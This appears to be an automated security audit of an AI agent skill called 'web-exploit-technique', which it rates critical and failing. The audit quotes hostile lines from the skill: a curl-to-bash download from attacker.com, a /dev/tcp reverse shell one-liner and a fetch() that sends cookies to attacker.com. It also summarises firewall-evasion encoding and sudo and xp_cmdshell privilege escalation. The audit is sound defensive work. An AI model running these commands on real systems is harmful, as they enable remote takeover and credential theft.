web-exploit-technique

Fail

Audited by Gen Agent Trust Hub on Sep 5, 2026

Risk Level: CRITICALREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONOBFUSCATIONPRIVILEGE_ESCALATIONDATA_EXFILTRATION
Full Analysis
  • [REMOTE_CODE_EXECUTION]: The skill contains a confirmed pattern of downloading and executing a remote shell script directly into bash (curl http://attacker.com/shell.sh | bash). This is a critical security risk as it allows for arbitrary code execution from a third-party server.
  • [COMMAND_EXECUTION]: The skill provides numerous reverse shell one-liners for various languages (Bash, Python, PowerShell) designed to establish interactive connections to an attacker-controlled host (e.g., bash -i >& /dev/tcp/<lhost>/<lport> 0>&1).
  • [OBFUSCATION]: The skill documents techniques for bypassing Web Application Firewalls (WAFs) using Base64 encoding, URL double-encoding, and character substitutions to hide malicious payloads from security scanners.
  • [PRIVILEGE_ESCALATION]: Instructions include techniques for exploiting sudo NOPASSWD rules and using database privileges (DBA/FILE) to achieve OS-level command execution via sqlmap or xp_cmdshell.
  • [DATA_EXFILTRATION]: The skill provides payloads for exfiltrating sensitive data (cookies, database content, local storage) to external domains (e.g., fetch('https://attacker.com/steal?c='+document.cookie)).
Recommendations
  • CRITICAL: 1 infected file(s) detected - DO NOT USE
  • HIGH: Downloads and executes remote code from: http://attacker.com/shell.sh - DO NOT USE without thorough review
  • AI detected serious security threats
  • Contains 1 malicious URL(s) - DO NOT USE
  • CRITICAL: 1 obfuscated URL(s) are MALICIOUS: https://legitimate.com/../../attacker.com - DO NOT USE
Audit Metadata
Risk Level
CRITICAL
Analyzed
Sep 5, 2026, 10:40 PM
Security Audit — agent-trust-hub — web-exploit-technique